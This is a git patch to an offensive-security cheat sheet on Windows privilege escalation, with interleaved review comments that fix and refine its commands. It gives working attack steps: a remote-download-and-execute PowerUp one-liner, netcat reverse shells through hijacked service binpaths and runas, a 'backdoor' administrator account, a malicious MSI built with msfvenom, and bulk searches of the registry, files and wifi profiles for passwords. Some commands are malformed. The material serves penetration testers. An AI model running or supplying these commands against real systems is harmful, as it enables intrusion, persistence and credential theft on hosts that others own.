From ecadcf3d0f25358d53285a66b1a53f14128ecd79 Mon Sep 17 00:00:00 2001
From: Swissky
Date: Sun, 3 Mar 2019 20:01:25 +0100
Subject: [PATCH] Windows PrivEsc - Full rewrite
---
 .../Windows - Privilege Escalation.md | 200 ++++++++++++++++--
 .../Windows - Using credentials.md | 3 +-
 2 files changed, 187 insertions(+), 16 deletions(-)
diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md
index 9a414df..b596fe9 100644
--- a/Methodology and Resources/Windows - Privilege Escalation.md
+++ b/Methodology and Resources/Windows - Privilege Escalation.md
@@ -1,18 +1,46 @@ # Windows - Privilege Escalation +## Summary + +* [Tools](#tools) +* [Windows Version and Configuration](#) +* [User Enumeration](#) +* [Network Enumeration](#) +* [EoP - Looting for passwords](#) +* [EoP - Processes Enumeration and Tasks](#) +* [EoP - Incorrect permissions in services](#) +* [EoP - Windows Subsystem for Linux (WSL)](#) +* [EoP - Unquoted Service Paths](#) +* [EoP - Kernel Exploitation](#) +* [EOP - AlwaysInstallElevated](#) +* [EoP - Insecure GUI apps](#) +* [EoP - Runas](#) + ## Tools - [Watson - Watson is a (.NET 2.0 compliant) C# implementation of Sherlock](https://github.com/rasta-mouse/Watson) - [(Deprecated) Sherlock - PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities](https://github.com/rasta-mouse/Sherlock) - [BeRoot - Privilege Escalation Project - Windows / Linux / Mac](https://github.com/AlessandroZ/BeRoot) - [Windows-Exploit-Suggester](https://github.com/GDSSecurity/Windows-Exploit-Suggester) + ```powershell + ./windows-exploit-suggester.py --update + ./windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo win7sp1-systeminfo.txt + ``` - [windows-privesc-check - Standalone Executable to Check for Simple Privilege Escalation Vectors on Windows Systems](https://github.com/pentestmonkey/windows-privesc-check) - [Powerless - Windows privilege escalation (enumeration) script designed with OSCP labs (legacy Windows) in mind](https://github.com/M4ximuss/Powerless) +- [PowerSploit's PowerUp](https://github.com/PowerShellMafia/PowerSploit) + ```powershell + powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks + ``` ## Windows Version and Configuration ```powershell systeminfo | findstr /B /C:"OS Name" /C:"OS Version" +``` + +Extract patchs and updates +```powershell wmic qfe ``` 
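Review bot: The PowerUp one-liner downloads `PowerUp.ps1` from the `master` branch of `PowerShellEmpire/PowerTools` while the bullet it sits under links to `PowerShellMafia/PowerSploit`, so the entry points at one repository and executes code from another, and an unpinned branch means the script run on a client host can change between engagements. Prefer the `Privesc/PowerUp.ps1` copy from the linked PowerSploit repository, or better host a reviewed copy yourself and reference a commit hash; `IEX` of an unpinned remote script is a supply-chain risk on a system you are responsible for. The `-Version 2` switch deserves a one-line caveat that it only works where the PowerShell 2.0 engine is still installed. Every summary link after `[Tools](#tools)` points to `#`, so the table of contents does not navigate; GitHub-style anchors such as `#eop---unquoted-service-paths` would make them work.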
@@ -56,7 +84,7 @@ List all users ```powershell net user -net users +net user Swissky whoami /all Get-LocalUser | ft Name,Enabled,LastLogon Get-ChildItem C:\Users -Force | select Name @@ -121,10 +149,15 @@ List all current connections netstat -ano ``` -List firware state and current configuration +List firewall state and current configuration ```powershell netsh advfirewall firewall dump + +or + +netsh firewall show state +netsh firewall show config ``` List all network shares @@ -140,7 +173,7 @@ reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse ``` -## Looting for passwords +## EoP - Looting for passwords ### SAM and SYSTEM files @@ -153,11 +186,12 @@ Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse %SYSTEMROOT%\System32\config\RegBack\system ``` -### Search for file contents** +### Search for file contents ```powershell cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt findstr /si password *.xml *.ini *.txt *.config +findstr /spin "password" *.* ``` ### Search for a file with a certain filename @@ -166,11 +200,20 @@ findstr /si password *.xml *.ini *.txt *.config dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config* ``` -### Search the registry for key names +### Search the registry for key names and passwords ```powershell REG QUERY HKLM /F "password" /t REG_SZ /S /K REG QUERY HKCU /F "password" /t REG_SZ /S /K + +reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" # Windows Autologin +reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP" # SNMP parameters +reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" # Putty clear text proxy credentials +reg query "HKCU\Software\ORL\WinVNC3\Password" # VNC credentials +reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password + +reg query HKLM /f password /t REG_SZ /s +reg query HKCU /f password /t REG_SZ /s ``` ### Read a value of a certain sub key 
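Review bot: `reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"` in the registry hunk has a stray backslash inside the key name; the path is `HKLM\SYSTEM\CurrentControlSet\Services\SNMP`, as the earlier SNMP queries in this file already spell it, so the command as written fails with a not-found error. The trailing `reg query HKLM /f password /t REG_SZ /s` and `reg query HKCU ...` lines repeat the `REG QUERY ... /K` lines above without `/K`, which is in fact the more useful form because without `/K` the search also covers value names and data rather than key names only; a comment saying which of the two to run (and that a full `/s` walk of HKLM can take minutes and is noisy) would help. In the firewall hunk, `netsh firewall` is the legacy context and has been removed from recent Windows builds, so `netsh advfirewall` should be presented as the primary command with the old form marked as a fallback for XP/2003-era hosts.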
@@ -244,6 +287,8 @@ C:\inetpub\wwwroot\web.config %USERPROFILE%\ntuser.dat %USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat %WINDIR%\System32\drivers\etc\hosts +dir c:*vnc.ini /s /b +dir c:*ultravnc.ini /s /b ``` ### Wifi passwords @@ -260,11 +305,11 @@ netsh wlan show profile key=clear Oneliner method to extract wifi passwords from all the access point. -````batch +```batch cls & echo. & for /f "tokens=4 delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name=%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on ``` -## Processes Enumeration and Tasks +## EoP - Processes Enumeration and Tasks What processes are running? @@ -295,6 +340,14 @@ Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,Last Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name ``` +List services + +```powershell +net start +wmic service list brief +tasklist /SVC +``` + Scheduled tasks ```powershell 
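Review bot: `dir c:*vnc.ini /s /b` and `dir c:*ultravnc.ini /s /b` have no backslash after the drive letter, so they search from the current directory on `C:` rather than from the root of the volume; `dir c:\*vnc.ini /s /b` is what is intended. The second line is also redundant, since the `*vnc.ini` pattern already matches `ultravnc.ini`.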
@@ -313,16 +366,82 @@ dir "C:\Documents and Settings\All Users\Start Menu\Programs\Startup" dir "C:\Documents and Settings\%username%\Start Menu\Programs\Startup" ``` +## EoP - Incorrect permissions in services -## PowerSploit's PowerUp +> A service running as Administrator/SYSTEM with incorrect file permissions might allow EoP. You can replace the binary, restart the service and get system. -Spot the weak service using PowerSploit's PowerUp +Often, services are pointing to writeable locations: +- Orphaned installs, not installed anymore but still exist in startup +- DLL Hijacking +- PATH directories with weak permissions ```powershell -powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks +$ for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> c:\windows\temp\permissions.txt +$ for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\permissions.txt) do cmd.exe /c icacls "%a" + +$ sc query state=all | findstr "SERVICE_NAME:" >> Servicenames.txt +FOR /F %i in (Servicenames.txt) DO echo %i +type Servicenames.txt +FOR /F "tokens=2 delims= " %i in (Servicenames.txt) DO @echo %i >> services.txt +FOR /F %i in (services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> path.txt ``` -## Windows Subsystem for Linux (WSL) +Alternatively you can use the Metasploit exploit : `exploit/windows/local/service_permissions` + +Note to check file permissions you can use `cacls` and `icacls` +> icacls (Windows Vista +) +> cacls (Windows XP) + +You are looking for `BUILTIN\Users:(F)`(Full access), `BUILTIN\Users:(M)`(Modify access) or `BUILTIN\Users:(W)`(Write-only access) in the output. 
+ +### Example with Windows XP SP1 + +```powershell +$ sc config upnphost binpath="C:\Inetpub\wwwroot\nc.exe YOUR_IP 1234 -e C:\WINDOWS\System32\cmd.exe" +sc config upnphost obj=".\LocalSystem" password="" +sc qc upnphost +``` + +If it fails because of a missing dependency, try the following commands. + +```powershell +sc config SSDPSRV start=auto +net start SSDPSRV +net stop upnphost +net start upnphost + +sc config upnphost depend="" +``` + +Using [`accesschk`](https://web.archive.org/web/20080530012252/http://live.sysinternals.com/accesschk.exe) from Sysinternals. +```powershell +$ accesschk.exe -uwcqv "Authenticated Users" * /accepteula +RW SSDPSRV + SERVICE_ALL_ACCESS +RW upnphost + SERVICE_ALL_ACCESS + +$ accesschk.exe -ucqv upnphost +upnphost + RW NT AUTHORITY\SYSTEM + SERVICE_ALL_ACCESS + RW BUILTIN\Administrators + SERVICE_ALL_ACCESS + RW NT AUTHORITY\Authenticated Users + SERVICE_ALL_ACCESS + RW BUILTIN\Power Users + SERVICE_ALL_ACCESS + +$ sc config binpath="net user backdoor backdoor123 /add" +$ sc config binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe" +$ sc stop +$ sc start +$ sc config binpath="net localgroup Administrators backdoor /add" +$ sc stop +$ sc start +``` + +## EoP - Windows Subsystem for Linux (WSL) Technique borrowed from [Warlockobama's tweet](https://twitter.com/Warlockobama/status/1067890915753132032) 
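Review bot: Every `sc config` line in the Windows XP example omits the space that `sc.exe` requires after `binpath=`, `obj=`, `password=`, `start=` and `depend=`, e.g. `sc config upnphost binpath= "C:\Inetpub\wwwroot\nc.exe YOUR_IP 1234 -e C:\WINDOWS\System32\cmd.exe"`, and the final block's `sc config binpath=...`, `sc stop` and `sc start` lines are missing the service name entirely, so as written they return a usage error. The section also mixes two different checks without saying so: the `icacls` loop tests the ACL on the service binary (replace the file), while `accesschk -c` tests the service object's DACL (`SERVICE_ALL_ACCESS` / `SERVICE_CHANGE_CONFIG`), which is what makes `sc config` possible, and a sentence separating the two would stop readers chasing the wrong one. The `BUILTIN\Users:(F)/(M)/(W)` guidance misses `Everyone`, `NT AUTHORITY\Authenticated Users` and the current user's own groups, which are equally exploitable principals. The `$ ` prompt prefixes inside cmd blocks are not part of the commands and should be dropped, and `net user backdoor backdoor123 /add` creates a persistent account that must be removed at the end of the engagement.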
@@ -339,17 +458,26 @@ Binary `bash.exe` can also be found in `C:\Windows\WinSxS\amd64_microsoft-window Alternatively you can explore the `WSL` filesystem in the folder `C:\Users\%USERNAME%\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79rhkp1fndgsc\LocalState\rootfs\` -## Unquoted Service Paths +## EoP - Unquoted Service Paths The Microsoft Windows Unquoted Service Path Enumeration Vulnerability. All Windows services have a Path to its executable. If that path is unquoted and contains whitespace or other separators, then the service will attempt to access a resource in the parent path first. ```powershell -wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:windows\" |findstr /i /v """ +wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """ gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name ``` -## Kernel Exploit +Metasploit provides the exploit : `exploit/windows/local/trusted_service_path` + +### Example + +For `C:\Program Files\something\legit.exe`, Windows will try the following paths first: +- `C:\Program.exe` +- `C:\Program Files.exe` + + +## EoP - Kernel Exploitation List of exploits kernel : [https://github.com/SecWiki/windows-kernel-exploits](https://github.com/SecWiki/windows-kernel-exploits) 
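Review bot: The example under "Unquoted Service Paths" is inaccurate: for `C:\Program Files\something\legit.exe` the loader only splits at whitespace, so it tries `C:\Program.exe` and then the full path; `C:\Program Files.exe` is never tried. A path with a space in a deeper component shows the real opportunity, e.g. `C:\Program Files\Some Vendor\app.exe` is resolved as `C:\Program.exe`, then `C:\Program Files\Some.exe`, then the full path, and exploitation needs write access to that intermediate directory plus the ability to restart the service (or a reboot if `SERVICE_STOP`/`SERVICE_START` is denied), which the section should state. The `findstr /i /v "C:\Windows\\"` filter also hides any vulnerable service installed under `C:\Windows`; that is a reasonable noise trade-off but deserves a comment so readers know what was excluded.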
@@ -371,8 +499,32 @@ List of exploits kernel : [https://github.com/SecWiki/windows-kernel-exploits](h ... - [MS03-026](./MS03-026)  [KB823980]   [Buffer Overrun In RPC Interface]  (/NT/2000/XP/2003) +## EOP - AlwaysInstallElevated -## Runas +Check if these registry values are set to "1". + +```bat +$ reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated + +$ reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated +``` + +Then create an MSI package and install it. + +```powershell +$ msfvenom -p windows/adduser USER=backdoor PASS=backdoor123 -f msi -o evil.msi +$ msiexec /quiet /qn /i C:\evil.msi +``` + +Technique also available in Metasploit : `exploit/windows/local/always_install_elevated` + +## EoP - Insecure GUI apps + +Application running as SYSTEM allowing an user to spawn a CMD, or browse directories. + +Example: "Windows Help and Support" (Windows + F1), search for "command prompt", click on "Click to open Command Prompt" + +## EoP - Runas Use the `cmdkey` to list the stored credentials on the machine. 
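Review bot: The AlwaysInstallElevated check should state that both the `HKCU` and `HKLM` `AlwaysInstallElevated` values must be `1`; if either is absent or `0` the MSI installs with the caller's own privileges and the technique silently does nothing, so a `reg query` error on one of the two keys already rules it out. `msfvenom -p windows/adduser` creates a local administrator account, which on hosts with account-management auditing enabled is logged (user creation and local-group membership change) and leaves an artifact that has to be cleaned up; a note on that, or an MSI that launches a reverse shell instead, fits a real engagement better. The "Windows Help and Support" example under insecure GUI apps appears to be from the XP/2003 era and should be hedged as such rather than presented as a current technique.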
@@ -390,8 +542,26 @@ The following example is calling a remote binary via an SMB share. runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe" ``` +Using `runas` with a provided set of credential. + +```powershell +C:\Windows\System32\runas.exe /env /noprofile /user: "c:\users\Public\nc.exe -nc 4444 -e cmd.exe" +``` + +```powershell +$ secpasswd = ConvertTo-SecureString "" -AsPlainText -Force +$ mycreds = New-Object System.Management.Automation.PSCredential ("", $secpasswd) +$ computer = "" +[System.Diagnostics.Process]::Start("C:\users\public\nc.exe"," 4444 -e cmd.exe", $mycreds.Username, $mycreds.Password, $computer) +``` + + + ## References +* [icacls - Docs Microsoft](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/icacls) +* [Privilege Escalation Windows - Philip Linghammar](https://xapax.gitbooks.io/security/content/privilege_escalation_windows.html) +* [Windows elevation of privileges - Guifre Ruiz](https://guif.re/windowseop) * [The Open Source Windows Privilege Escalation Cheat Sheet by amAK.xyz and @xxByte](https://addaxsoft.com/wpecs/) * [Basic Linux Privilege Escalation](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/) * [Windows Privilege Escalation Fundamentals](http://www.fuzzysecurity.com/tutorials/16.html) diff --git a/Methodology and Resources/Windows - Using credentials.md b/Methodology and Resources/Windows - Using credentials.md index ffe4ae8..c1034cc 100644 --- a/Methodology and Resources/Windows - Using credentials.md +++ b/Methodology and Resources/Windows - Using credentials.md 
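Review bot: `runas /env /noprofile /user: "c:\users\Public\nc.exe -nc 4444 -e cmd.exe"` has an empty `/user:` and an invalid netcat invocation, since `-nc` is not a netcat option and no host is given; it should read `runas /env /noprofile /user:<DOMAIN>\<user> "c:\users\Public\nc.exe -nv <attacker-ip> 4444 -e cmd.exe"`, with a note that `runas` prompts for the password and therefore needs an interactive session. The PowerShell block has the same gaps: the empty strings passed to `ConvertTo-SecureString`, `PSCredential` and `$computer`, and the `" 4444 -e cmd.exe"` argument string, should carry `<password>`, `<user>`, `<domain>` and `<attacker-ip>` placeholders so readers know what to fill in, and the `$ ` prompt prefixes are not PowerShell syntax. It is also worth saying that the `Process.Start` overload used here takes the domain as its last argument and that the password sits in plain text in the script and in PowerShell history.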
@@ -93,8 +93,9 @@ python wmiexec.py CSCOU/jarrieta:nastyCutt3r@10.9.122.5 ```powershell python rdpcheck.py CSCOU/jarrieta:nastyCutt3r@10.9.122.5 -rdesktop -d CSCOU -u jarrieta -p nastyCutt3r 10.9.122.5 -g 70% +rdesktop -d CSCOU -u jarrieta -p nastyCutt3r 10.9.122.5 -g 70 -r disk:share=/home/user/myshare # -g : the screen will take up 70% of your actual screen size +# -r disk:share : sharing a local folder during a remote desktop session ``` Note: you may need to enable it with the following command